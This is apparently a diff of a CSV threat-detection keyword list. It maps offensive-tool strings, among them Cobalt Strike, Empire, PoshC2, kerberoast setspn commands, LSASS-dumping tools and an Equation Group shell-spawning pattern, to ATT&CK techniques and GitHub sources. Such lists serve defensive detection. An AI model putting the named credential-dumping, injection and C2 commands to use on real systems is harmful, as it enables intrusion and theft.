- T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*setspn -A HTTP/*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn.exe -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*Setting up GFlags & SilentProcessExit settings in registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Setting up GFlags & SilentProcessExit settings in registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*setup_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*seventeenman/CallBackDump*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*sfp_portscan_tcp.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*sfp_torexits.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 